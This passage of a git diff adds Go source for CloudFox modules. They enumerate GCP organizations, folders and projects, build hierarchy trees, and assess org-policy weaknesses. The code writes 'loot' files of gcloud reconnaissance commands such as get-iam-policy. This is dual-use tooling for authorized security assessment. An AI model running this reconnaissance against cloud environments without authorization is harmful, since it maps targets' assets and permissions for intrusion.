+ +Features: +- Lists accessible organizations +- Shows folder structure +- Maps project relationships +- Displays resource hierarchy tree +- Shows ancestry paths for projects`, + Run: runGCPOrganizationsCommand, +} + +// ------------------------------ +// Module Struct with embedded BaseGCPModule +// ------------------------------ +type OrganizationsModule struct { + gcpinternal.BaseGCPModule + + // Module-specific fields + Organizations []orgsservice.OrganizationInfo + Folders []orgsservice.FolderInfo + Projects []orgsservice.ProjectInfo + Ancestry [][]orgsservice.HierarchyNode + LootMap map[string]*internal.LootFile +} + +// ------------------------------ +// Output Struct implementing CloudfoxOutput interface +// ------------------------------ +type OrganizationsOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o OrganizationsOutput) TableFiles() []internal.TableFile { return o.Table } +func (o OrganizationsOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPOrganizationsCommand(cmd *cobra.Command, args []string) { + // Initialize command context + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_ORGANIZATIONS_MODULE_NAME) + if err != nil { + return // Error already logged + } + + // Create module instance + module := &OrganizationsModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Organizations: []orgsservice.OrganizationInfo{}, + Folders: []orgsservice.FolderInfo{}, + Projects: []orgsservice.ProjectInfo{}, + Ancestry: [][]orgsservice.HierarchyNode{}, + LootMap: make(map[string]*internal.LootFile), + } + + // Initialize loot files + module.initializeLootFiles() + + // Execute enumeration + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *OrganizationsModule) Execute(ctx 
context.Context, logger internal.Logger) { + orgsSvc := orgsservice.New() + + // Check if org cache is available (auto-loaded at startup) + if orgCache := gcpinternal.GetOrgCacheFromContext(ctx); orgCache != nil && orgCache.IsPopulated() { + logger.InfoM("Using cached organization data", globals.GCP_ORGANIZATIONS_MODULE_NAME) + + // Convert cached data to module format + for _, org := range orgCache.Organizations { + m.Organizations = append(m.Organizations, orgsservice.OrganizationInfo{ + Name: org.Name, + DisplayName: org.DisplayName, + DirectoryID: org.DirectoryID, + State: org.State, + }) + } + for _, folder := range orgCache.Folders { + m.Folders = append(m.Folders, orgsservice.FolderInfo{ + Name: folder.Name, + DisplayName: folder.DisplayName, + Parent: folder.Parent, + State: folder.State, + }) + } + for _, project := range orgCache.AllProjects { + m.Projects = append(m.Projects, orgsservice.ProjectInfo{ + Name: project.Name, + ProjectID: project.ID, + DisplayName: project.DisplayName, + Parent: project.Parent, + State: project.State, + }) + } + } else { + // No context cache, try loading from disk cache + diskCache, metadata, err := gcpinternal.LoadOrgCacheFromFile(m.OutputDirectory, m.Account) + if err == nil && diskCache != nil && diskCache.IsPopulated() { + logger.InfoM(fmt.Sprintf("Using disk cache (created: %s, %d projects)", + metadata.CreatedAt.Format("2006-01-02 15:04:05"), metadata.TotalProjects), globals.GCP_ORGANIZATIONS_MODULE_NAME) + + // Convert cached data to module format + for _, org := range diskCache.Organizations { + m.Organizations = append(m.Organizations, orgsservice.OrganizationInfo{ + Name: org.Name, + DisplayName: org.DisplayName, + DirectoryID: org.DirectoryID, + State: org.State, + }) + } + for _, folder := range diskCache.Folders { + m.Folders = append(m.Folders, orgsservice.FolderInfo{ + Name: folder.Name, + DisplayName: folder.DisplayName, + Parent: folder.Parent, + State: folder.State, + }) + } + for _, project := range 
diskCache.AllProjects { + m.Projects = append(m.Projects, orgsservice.ProjectInfo{ + Name: project.Name, + ProjectID: project.ID, + DisplayName: project.DisplayName, + Parent: project.Parent, + State: project.State, + }) + } + } else { + // No disk cache either, enumerate directly and save + logger.InfoM("Enumerating organizations, folders, and projects...", globals.GCP_ORGANIZATIONS_MODULE_NAME) + + // Get organizations + orgs, err := orgsSvc.SearchOrganizations() + if err != nil { + logger.InfoM(fmt.Sprintf("Could not enumerate organizations: %v", err), globals.GCP_ORGANIZATIONS_MODULE_NAME) + } else { + m.Organizations = orgs + } + + // Get all folders + folders, err := orgsSvc.SearchAllFolders() + if err != nil { + logger.InfoM(fmt.Sprintf("Could not enumerate folders: %v", err), globals.GCP_ORGANIZATIONS_MODULE_NAME) + } else { + m.Folders = folders + } + + // Get all projects + projects, err := orgsSvc.SearchProjects("") + if err != nil { + logger.InfoM(fmt.Sprintf("Could not enumerate projects: %v", err), globals.GCP_ORGANIZATIONS_MODULE_NAME) + } else { + m.Projects = projects + } + + // Save to disk cache for future use + m.saveToOrgCache(logger) + } + } + + // Get ancestry for each specified project + for _, projectID := range m.ProjectIDs { + ancestry, err := orgsSvc.GetProjectAncestry(projectID) + if err != nil { + logger.InfoM(fmt.Sprintf("Could not get ancestry for project %s: %v", projectID, err), globals.GCP_ORGANIZATIONS_MODULE_NAME) + } else { + m.Ancestry = append(m.Ancestry, ancestry) + } + } + + // Generate loot + m.generateLoot() + + // Report findings + logger.SuccessM(fmt.Sprintf("Found %d organization(s), %d folder(s), %d project(s)", + len(m.Organizations), len(m.Folders), len(m.Projects)), globals.GCP_ORGANIZATIONS_MODULE_NAME) + + // Write output + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *OrganizationsModule) initializeLootFiles() { + 
m.LootMap["org-commands"] = &internal.LootFile{ + Name: "org-commands", + Contents: "# GCP Organization Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + m.LootMap["org-map"] = &internal.LootFile{ + Name: "org-map", + Contents: "", + } + m.LootMap["org-tree"] = &internal.LootFile{ + Name: "org-tree", + Contents: "", + } + m.LootMap["org-scope-hierarchy"] = &internal.LootFile{ + Name: "org-scope-hierarchy", + Contents: "", + } +} + +func (m *OrganizationsModule) generateLoot() { + // Generate expandable markdown tree view (org map) + m.generateMarkdownTreeView() + + // Generate standard ASCII tree view + m.generateTextTreeView() + + // Generate linear hierarchy for scoped projects only + m.generateScopeHierarchy() + + // Gcloud commands for organizations + m.LootMap["org-commands"].Contents += "# =============================================================================\n" + m.LootMap["org-commands"].Contents += "# ORGANIZATION COMMANDS\n" + m.LootMap["org-commands"].Contents += "# =============================================================================\n\n" + + for _, org := range m.Organizations { + orgID := strings.TrimPrefix(org.Name, "organizations/") + m.LootMap["org-commands"].Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# ORGANIZATION: %s (%s)\n"+ + "# =============================================================================\n"+ + "gcloud organizations describe %s\n"+ + "gcloud organizations get-iam-policy %s\n"+ + "gcloud resource-manager folders list --organization=%s\n"+ + "gcloud projects list --filter='parent.id=%s'\n\n", + org.DisplayName, orgID, + orgID, + orgID, + orgID, + orgID, + ) + } + + // Gcloud commands for folders + if len(m.Folders) > 0 { + m.LootMap["org-commands"].Contents += "# =============================================================================\n" + m.LootMap["org-commands"].Contents += "# FOLDER 
COMMANDS\n"
+ m.LootMap["org-commands"].Contents += "# =============================================================================\n\n"
+
+ for _, folder := range m.Folders {
+ folderID := strings.TrimPrefix(folder.Name, "folders/")
+ m.LootMap["org-commands"].Contents += fmt.Sprintf(
+ "# =============================================================================\n"+
+ "# FOLDER: %s (%s)\n"+
+ "# =============================================================================\n"+
+ "gcloud resource-manager folders describe %s\n"+
+ "gcloud resource-manager folders get-iam-policy %s\n"+
+ "gcloud resource-manager folders list --folder=%s\n"+
+ "gcloud projects list --filter='parent.id=%s'\n\n",
+ folder.DisplayName, folderID,
+ folderID,
+ folderID,
+ folderID,
+ folderID,
+ )
+ }
+ }
+}
+
+// generateMarkdownTreeView creates a beautified expandable markdown tree of the organization hierarchy
+func (m *OrganizationsModule) generateMarkdownTreeView() {
+ tree := &m.LootMap["org-map"].Contents
+
+ *tree += "# GCP Organization Hierarchy\n\n"
+
+ for _, org := range m.Organizations {
+ orgID := strings.TrimPrefix(org.Name, "organizations/")
+ displayName := org.DisplayName
+ if displayName == "" {
+ displayName = orgID
+ }
+
+ // Get direct children (folders and projects) of this org
+ childFolders := m.getChildFolders(org.Name)
+ childProjects := m.getChildProjects(org.Name)
+
+ // Start expandable section for organization
+ *tree += fmt.Sprintf("<details>\n<summary>🏢 Organization: %s (%s)</summary>\n\n", displayName, orgID)
+
+ // Add folders as expandable sections
+ for _, folder := range childFolders {
+ m.addFolderToMarkdownTree(tree, folder, 1)
+ }
+
+ // Add projects directly under org
+ if len(childProjects) > 0 {
+ for _, proj := range childProjects {
+ projDisplayName := proj.DisplayName
+ if projDisplayName == "" {
+ projDisplayName = proj.ProjectID
+ }
+ *tree += fmt.Sprintf("- 📁 **Project:** %s (`%s`)\n", projDisplayName, proj.ProjectID)
+ }
+ *tree += "\n"
+ }
+
+ *tree += "</details>\n\n"
+ }
+
+ // Handle standalone projects (no org parent)
+ standaloneProjects := m.getStandaloneProjects()
+ if len(standaloneProjects) > 0 {
+ *tree += "<details>\n<summary>📦 Standalone Projects (no organization)</summary>\n\n"
+ for _, proj := range standaloneProjects {
+ displayName := proj.DisplayName
+ if displayName == "" {
+ displayName = proj.ProjectID
+ }
+ *tree += fmt.Sprintf("- 📁 **Project:** %s (`%s`)\n", displayName, proj.ProjectID)
+ }
+ *tree += "\n</details>\n"
+ }
+}
+
+// addFolderToMarkdownTree recursively adds a folder and its children as expandable markdown
+func (m *OrganizationsModule) addFolderToMarkdownTree(tree *string, folder orgsservice.FolderInfo, depth int) {
+ folderID := strings.TrimPrefix(folder.Name, "folders/")
+ displayName := folder.DisplayName
+ if displayName == "" {
+ displayName = folderID
+ }
+
+ // Get children of this folder
+ childFolders := m.getChildFolders(folder.Name)
+ childProjects := m.getChildProjects(folder.Name)
+
+ hasChildren := len(childFolders) > 0 || len(childProjects) > 0
+
+ if hasChildren {
+ // Folder with children - make it expandable
+ *tree += fmt.Sprintf("<details>\n<summary>📂 Folder: %s (%s)</summary>\n\n", displayName, folderID)
+
+ // Add child folders
+ for _, childFolder := range childFolders {
+ m.addFolderToMarkdownTree(tree, childFolder, depth+1)
+ }
+
+ // Add child projects
+ for _, proj := range childProjects {
+ projDisplayName := proj.DisplayName
+ if projDisplayName == "" {
+ projDisplayName = proj.ProjectID
+ }
+ *tree += fmt.Sprintf("- 📁 **Project:** %s (`%s`)\n", projDisplayName, proj.ProjectID)
+ }
+
+ *tree += "\n</details>\n\n"
+ } else {
+ // Empty folder - just a list item
+ *tree += fmt.Sprintf("- 📂 **Folder:** %s (`%s`) *(empty)*\n", displayName, folderID)
+ }
+}
+
+// generateTextTreeView creates a standard ASCII tree of the organization hierarchy
+func (m *OrganizationsModule) generateTextTreeView() {
+ tree := &m.LootMap["org-tree"].Contents
+
+ for _, org := range m.Organizations {
+ orgID := strings.TrimPrefix(org.Name, "organizations/")
+ displayName := org.DisplayName
+ if displayName == "" {
+ displayName = orgID
+ }
+ *tree += fmt.Sprintf("Organization: %s (%s)\n", displayName, orgID)
+
+ // Get direct children (folders and projects) of this org
+ childFolders := m.getChildFolders(org.Name)
+ childProjects := m.getChildProjects(org.Name)
+
+ totalChildren := len(childFolders) + len(childProjects)
+ childIndex := 0
+
+ // Add folders
+ for _, folder := range childFolders {
+ childIndex++
+ isLast := childIndex == totalChildren
+ m.addFolderToTextTree(tree, folder, "", isLast)
+ }
+
+ // Add projects directly under org
+ for _, proj := range childProjects {
+ childIndex++
+ isLast := childIndex == totalChildren
+ prefix := "├── "
+ if isLast {
+ prefix = "└── "
+ }
+ projDisplayName := proj.DisplayName
+ if projDisplayName == "" {
+ projDisplayName = proj.ProjectID
+ }
+ *tree += fmt.Sprintf("%sProject: %s (%s)\n", prefix, projDisplayName, proj.ProjectID)
+ }
+
+ *tree += "\n"
+ }
+
+ // Handle standalone projects (no org parent)
+ standaloneProjects := m.getStandaloneProjects()
+ if len(standaloneProjects) > 0 {
+ *tree += "Standalone Projects (no organization):\n"
+ for i, proj := range standaloneProjects {
+ isLast := i == len(standaloneProjects)-1
+ prefix := "├── "
+ if isLast {
+ prefix = "└── "
+ }
+ displayName := proj.DisplayName
+ if displayName == "" {
+ displayName = proj.ProjectID
+ }
+ *tree += fmt.Sprintf("%sProject: %s (%s)\n", prefix, displayName, proj.ProjectID)
+ }
+ }
+}
+
+// addFolderToTextTree recursively adds a folder and its children to the ASCII 
tree +func (m *OrganizationsModule) addFolderToTextTree(tree *string, folder orgsservice.FolderInfo, indent string, isLast bool) { + folderID := strings.TrimPrefix(folder.Name, "folders/") + displayName := folder.DisplayName + if displayName == "" { + displayName = folderID + } + + // Determine the prefix for this item + prefix := "├── " + if isLast { + prefix = "└── " + } + + *tree += fmt.Sprintf("%s%sFolder: %s (%s)\n", indent, prefix, displayName, folderID) + + // Determine the indent for children + childIndent := indent + "│ " + if isLast { + childIndent = indent + " " + } + + // Get children of this folder + childFolders := m.getChildFolders(folder.Name) + childProjects := m.getChildProjects(folder.Name) + + totalChildren := len(childFolders) + len(childProjects) + childIndex := 0 + + // Add child folders + for _, childFolder := range childFolders { + childIndex++ + childIsLast := childIndex == totalChildren + m.addFolderToTextTree(tree, childFolder, childIndent, childIsLast) + } + + // Add child projects + for _, proj := range childProjects { + childIndex++ + childIsLast := childIndex == totalChildren + childPrefix := "├── " + if childIsLast { + childPrefix = "└── " + } + projDisplayName := proj.DisplayName + if projDisplayName == "" { + projDisplayName = proj.ProjectID + } + *tree += fmt.Sprintf("%s%sProject: %s (%s)\n", childIndent, childPrefix, projDisplayName, proj.ProjectID) + } +} + +// generateScopeHierarchy creates a linear hierarchy view for only the projects in scope (-p or -l) +func (m *OrganizationsModule) generateScopeHierarchy() { + hierarchy := &m.LootMap["org-scope-hierarchy"].Contents + + *hierarchy = "# GCP Scope Hierarchy\n" + *hierarchy += "# Linear hierarchy paths for projects in scope\n" + *hierarchy += "# Generated by CloudFox\n\n" + + if len(m.ProjectIDs) == 0 { + *hierarchy += "No projects in scope.\n" + return + } + + // For each project in scope, show its full hierarchy path + for _, projectID := range m.ProjectIDs { + // Find the 
project info + var projectInfo *orgsservice.ProjectInfo + for i := range m.Projects { + if m.Projects[i].ProjectID == projectID { + projectInfo = &m.Projects[i] + break + } + } + + if projectInfo == nil { + *hierarchy += fmt.Sprintf("Project: %s (not found in hierarchy)\n\n", projectID) + continue + } + + // Build the hierarchy path from project up to org + path := m.buildHierarchyPath(projectInfo) + + // Output the linear path + projectName := projectInfo.DisplayName + if projectName == "" { + projectName = projectID + } + + *hierarchy += fmt.Sprintf("## %s (%s)\n", projectName, projectID) + + // Show path from org down to project + for i, node := range path { + indent := strings.Repeat(" ", i) + *hierarchy += fmt.Sprintf("%s%s\n", indent, node) + } + *hierarchy += "\n" + } +} + +// buildHierarchyPath builds the hierarchy path from org down to project +func (m *OrganizationsModule) buildHierarchyPath(project *orgsservice.ProjectInfo) []string { + var path []string + + // Start from the project and work up + var reversePath []string + + // Add project + projectName := project.DisplayName + if projectName == "" { + projectName = project.ProjectID + } + reversePath = append(reversePath, fmt.Sprintf("└── Project: %s (%s)", projectName, project.ProjectID)) + + // Traverse up the hierarchy + currentParent := project.Parent + for currentParent != "" { + if strings.HasPrefix(currentParent, "folders/") { + folderID := strings.TrimPrefix(currentParent, "folders/") + folderName := m.getFolderName(folderID) + reversePath = append(reversePath, fmt.Sprintf("└── Folder: %s (%s)", folderName, folderID)) + + // Find the folder's parent + for _, folder := range m.Folders { + if folder.Name == currentParent { + currentParent = folder.Parent + break + } + } + } else if strings.HasPrefix(currentParent, "organizations/") { + orgID := strings.TrimPrefix(currentParent, "organizations/") + orgName := m.getOrgName(orgID) + reversePath = append(reversePath, fmt.Sprintf("Organization: %s 
(%s)", orgName, orgID)) + break + } else { + break + } + } + + // Reverse to get org -> folder -> project order + for i := len(reversePath) - 1; i >= 0; i-- { + path = append(path, reversePath[i]) + } + + return path +} + +// getChildFolders returns folders that are direct children of the given parent +func (m *OrganizationsModule) getChildFolders(parentName string) []orgsservice.FolderInfo { + var children []orgsservice.FolderInfo + for _, folder := range m.Folders { + if folder.Parent == parentName { + children = append(children, folder) + } + } + return children +} + +// getChildProjects returns projects that are direct children of the given parent +func (m *OrganizationsModule) getChildProjects(parentName string) []orgsservice.ProjectInfo { + var children []orgsservice.ProjectInfo + for _, proj := range m.Projects { + if proj.Parent == parentName { + children = append(children, proj) + } + } + return children +} + +// getStandaloneProjects returns projects that don't belong to any organization +func (m *OrganizationsModule) getStandaloneProjects() []orgsservice.ProjectInfo { + var standalone []orgsservice.ProjectInfo + for _, proj := range m.Projects { + // Check if parent is not an org or folder + if !strings.HasPrefix(proj.Parent, "organizations/") && !strings.HasPrefix(proj.Parent, "folders/") { + standalone = append(standalone, proj) + } + } + return standalone +} + +// getFolderName returns the display name for a folder ID +func (m *OrganizationsModule) getFolderName(folderID string) string { + for _, folder := range m.Folders { + id := strings.TrimPrefix(folder.Name, "folders/") + if id == folderID { + if folder.DisplayName != "" { + return folder.DisplayName + } + return folderID + } + } + return folderID +} + +// getOrgName returns the display name for an organization ID +func (m *OrganizationsModule) getOrgName(orgID string) string { + for _, org := range m.Organizations { + id := strings.TrimPrefix(org.Name, "organizations/") + if id == orgID { + if 
org.DisplayName != "" { + return org.DisplayName + } + return orgID + } + } + return orgID +} + +// saveToOrgCache saves enumerated org data to disk cache +func (m *OrganizationsModule) saveToOrgCache(logger internal.Logger) { + cache := gcpinternal.NewOrgCache() + + // Convert module data to cache format + for _, org := range m.Organizations { + orgID := strings.TrimPrefix(org.Name, "organizations/") + cache.AddOrganization(gcpinternal.CachedOrganization{ + ID: orgID, + Name: org.Name, + DisplayName: org.DisplayName, + DirectoryID: org.DirectoryID, + State: org.State, + }) + } + for _, folder := range m.Folders { + folderID := strings.TrimPrefix(folder.Name, "folders/") + cache.AddFolder(gcpinternal.CachedFolder{ + ID: folderID, + Name: folder.Name, + DisplayName: folder.DisplayName, + Parent: folder.Parent, + State: folder.State, + }) + } + for _, project := range m.Projects { + // Extract project number from Name (format: "projects/123456789") + projectNumber := "" + if strings.HasPrefix(project.Name, "projects/") { + projectNumber = strings.TrimPrefix(project.Name, "projects/") + } + cache.AddProject(gcpinternal.CachedProject{ + ID: project.ProjectID, + Number: projectNumber, + Name: project.Name, + DisplayName: project.DisplayName, + Parent: project.Parent, + State: project.State, + }) + } + cache.MarkPopulated() + + // Save to disk + err := gcpinternal.SaveOrgCacheToFile(cache, m.OutputDirectory, m.Account, "1.0") + if err != nil { + logger.InfoM(fmt.Sprintf("Could not save org cache: %v", err), globals.GCP_ORGANIZATIONS_MODULE_NAME) + } else { + logger.InfoM(fmt.Sprintf("Saved org cache to disk (%d orgs, %d folders, %d projects)", + len(m.Organizations), len(m.Folders), len(m.Projects)), globals.GCP_ORGANIZATIONS_MODULE_NAME) + } +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *OrganizationsModule) writeOutput(ctx context.Context, logger internal.Logger) { + if m.Hierarchy != nil && !m.FlatOutput { + 
m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *OrganizationsModule) buildTables() []internal.TableFile { + // Organizations table + orgsHeader := []string{ + "Organization ID", + "Display Name", + "State", + "Directory ID", + } + + var orgsBody [][]string + for _, org := range m.Organizations { + orgID := strings.TrimPrefix(org.Name, "organizations/") + orgsBody = append(orgsBody, []string{ + orgID, + org.DisplayName, + org.State, + org.DirectoryID, + }) + } + + // Folders table + foldersHeader := []string{ + "Folder ID", + "Display Name", + "Parent", + "State", + } + + var foldersBody [][]string + for _, folder := range m.Folders { + folderID := strings.TrimPrefix(folder.Name, "folders/") + foldersBody = append(foldersBody, []string{ + folderID, + folder.DisplayName, + folder.Parent, + folder.State, + }) + } + + // Projects table + projectsHeader := []string{ + "Project ID", + "Project Name", + "Display Name", + "Parent", + "State", + } + + var projectsBody [][]string + for _, proj := range m.Projects { + projectsBody = append(projectsBody, []string{ + proj.ProjectID, + m.GetProjectName(proj.ProjectID), + proj.DisplayName, + proj.Parent, + proj.State, + }) + } + + // Ancestry table + ancestryHeader := []string{ + "Project ID", + "Project Name", + "Ancestry Path", + } + + var ancestryBody [][]string + for _, ancestry := range m.Ancestry { + if len(ancestry) > 0 { + // Build ancestry path string with names + var path []string + projectID := "" + for _, node := range ancestry { + if node.Type == "project" { + projectID = node.ID + projName := m.GetProjectName(node.ID) + if projName != "" && projName != node.ID { + path = append(path, fmt.Sprintf("project:%s (%s)", projName, node.ID)) + } else { + path = append(path, fmt.Sprintf("project:%s", node.ID)) + } + } else if node.Type == "folder" { + folderName := m.getFolderName(node.ID) + if folderName != "" && folderName != node.ID { + path = append(path, 
fmt.Sprintf("folder:%s (%s)", folderName, node.ID)) + } else { + path = append(path, fmt.Sprintf("folder:%s", node.ID)) + } + } else if node.Type == "organization" { + orgName := m.getOrgName(node.ID) + if orgName != "" && orgName != node.ID { + path = append(path, fmt.Sprintf("organization:%s (%s)", orgName, node.ID)) + } else { + path = append(path, fmt.Sprintf("organization:%s", node.ID)) + } + } else { + path = append(path, fmt.Sprintf("%s:%s", node.Type, node.ID)) + } + } + ancestryBody = append(ancestryBody, []string{ + projectID, + m.GetProjectName(projectID), + strings.Join(path, " -> "), + }) + } + } + + // Build tables + var tables []internal.TableFile + + if len(orgsBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "organizations", + Header: orgsHeader, + Body: orgsBody, + }) + } + + if len(foldersBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "org-folders", + Header: foldersHeader, + Body: foldersBody, + }) + } + + if len(projectsBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "org-projects", + Header: projectsHeader, + Body: projectsBody, + }) + } + + if len(ancestryBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "org-ancestry", + Header: ancestryHeader, + Body: ancestryBody, + }) + } + + return tables +} + +func (m *OrganizationsModule) collectLootFiles() []internal.LootFile { + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + return lootFiles +} + +func (m *OrganizationsModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + // For organizations module, output at org level since it enumerates the whole hierarchy + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: 
make(map[string]internal.CloudfoxOutput), + } + + tables := m.buildTables() + lootFiles := m.collectLootFiles() + + output := OrganizationsOutput{ + Table: tables, + Loot: lootFiles, + } + + // Determine output location - prefer org-level, fall back to project-level + orgID := "" + + // First, try to get org ID from the hierarchy + if m.Hierarchy != nil && len(m.Hierarchy.Organizations) > 0 { + orgID = m.Hierarchy.Organizations[0].ID + } else if len(m.Organizations) > 0 { + // Fall back to enumerated organizations if hierarchy not available + orgID = strings.TrimPrefix(m.Organizations[0].Name, "organizations/") + } + + // Ensure hierarchy has display names from our enumeration + // This handles the case where the hierarchy was built before we enumerated orgs + if m.Hierarchy != nil && len(m.Organizations) > 0 { + for _, org := range m.Organizations { + numericID := strings.TrimPrefix(org.Name, "organizations/") + // Update display name in hierarchy if we have a better one + for i := range m.Hierarchy.Organizations { + if m.Hierarchy.Organizations[i].ID == numericID { + if m.Hierarchy.Organizations[i].DisplayName == "" && org.DisplayName != "" { + m.Hierarchy.Organizations[i].DisplayName = org.DisplayName + } + break + } + } + } + } + + if orgID != "" { + // Place at org level + outputData.OrgLevelData[orgID] = output + } else if len(m.ProjectIDs) > 0 { + // Fall back to first project level if no org discovered + outputData.ProjectLevelData[m.ProjectIDs[0]] = output + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_ORGANIZATIONS_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +func (m *OrganizationsModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + tables := m.buildTables() + lootFiles := m.collectLootFiles() + + output := 
OrganizationsOutput{ + Table: tables, + Loot: lootFiles, + } + + // Write output using HandleOutputSmart with scope support + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", // scopeType + m.ProjectIDs, // scopeIdentifiers + scopeNames, // scopeNames + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_ORGANIZATIONS_MODULE_NAME) + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/orgpolicies.go b/gcp/commands/orgpolicies.go new file mode 100644 index 00000000..5c9275b2 --- /dev/null +++ b/gcp/commands/orgpolicies.go @@ -0,0 +1,417 @@ +package commands + +import ( + "github.com/BishopFox/cloudfox/gcp/shared" + "context" + "fmt" + "strings" + "sync" + + orgpolicyservice "github.com/BishopFox/cloudfox/gcp/services/orgpolicyService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPOrgPoliciesCommand = &cobra.Command{ + Use: globals.GCP_ORGPOLICIES_MODULE_NAME, + Aliases: []string{"orgpolicy", "policies"}, + Short: "Enumerate organization policies and identify security weaknesses", + Long: `Enumerate GCP organization policies to identify security configuration weaknesses. + +Organization policies control security constraints across GCP resources. This module +identifies policies that may be misconfigured or weakened, creating security risks. 
+ +Security-Relevant Policies Analyzed: +- Domain restrictions (iam.allowedPolicyMemberDomains) +- Service account key controls (iam.disableServiceAccountKeyCreation) +- Workload identity restrictions +- Compute security (Shielded VM, OS Login, external IPs) +- Storage security (public access, uniform access) +- SQL security (public IPs, authorized networks) +- GKE security (public endpoints) +- Resource location restrictions + +Risk Indicators: +- AllowAll: Policy allows any value (HIGH risk) +- Wildcard patterns: Overly permissive allowed values +- Unenforced: Security constraint not enabled +- Override: Project overrides parent restrictions`, + Run: runGCPOrgPoliciesCommand, +} + +type OrgPoliciesModule struct { + gcpinternal.BaseGCPModule + ProjectPolicies map[string][]orgpolicyservice.OrgPolicyInfo // projectID -> policies + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + mu sync.Mutex +} + +type OrgPoliciesOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o OrgPoliciesOutput) TableFiles() []internal.TableFile { return o.Table } +func (o OrgPoliciesOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPOrgPoliciesCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_ORGPOLICIES_MODULE_NAME) + if err != nil { + return + } + + module := &OrgPoliciesModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectPolicies: make(map[string][]orgpolicyservice.OrgPolicyInfo), + LootMap: make(map[string]map[string]*internal.LootFile), + } + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +func (m *OrgPoliciesModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_ORGPOLICIES_MODULE_NAME, m.processProject) + + allPolicies := m.getAllPolicies() + if len(allPolicies) == 0 { + logger.InfoM("No organization policies found (may require 
orgpolicy.policies.list permission)", globals.GCP_ORGPOLICIES_MODULE_NAME) + return + } + + logger.SuccessM(fmt.Sprintf("Found %d organization policy(ies)", len(allPolicies)), globals.GCP_ORGPOLICIES_MODULE_NAME) + m.writeOutput(ctx, logger) +} + +func (m *OrgPoliciesModule) getAllPolicies() []orgpolicyservice.OrgPolicyInfo { + var all []orgpolicyservice.OrgPolicyInfo + for _, policies := range m.ProjectPolicies { + all = append(all, policies...) + } + return all +} + +func (m *OrgPoliciesModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating org policies in project: %s", projectID), globals.GCP_ORGPOLICIES_MODULE_NAME) + } + + m.mu.Lock() + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["orgpolicies-commands"] = &internal.LootFile{ + Name: "orgpolicies-commands", + Contents: "# Organization Policy Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + } + m.mu.Unlock() + + svc := orgpolicyservice.New() + policies, err := svc.ListProjectPolicies(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_ORGPOLICIES_MODULE_NAME, + fmt.Sprintf("Could not enumerate org policies in project %s", projectID)) + return + } + + m.mu.Lock() + m.ProjectPolicies[projectID] = policies + for _, policy := range policies { + m.addPolicyToLoot(projectID, policy) + } + m.mu.Unlock() +} + +func (m *OrgPoliciesModule) addPolicyToLoot(projectID string, policy orgpolicyservice.OrgPolicyInfo) { + lootFile := m.LootMap[projectID]["orgpolicies-commands"] + if lootFile == nil { + return + } + // Extract short constraint name for commands + constraintName := policy.Constraint + if strings.HasPrefix(constraintName, "constraints/") { + constraintName = strings.TrimPrefix(constraintName, "constraints/") + } + 
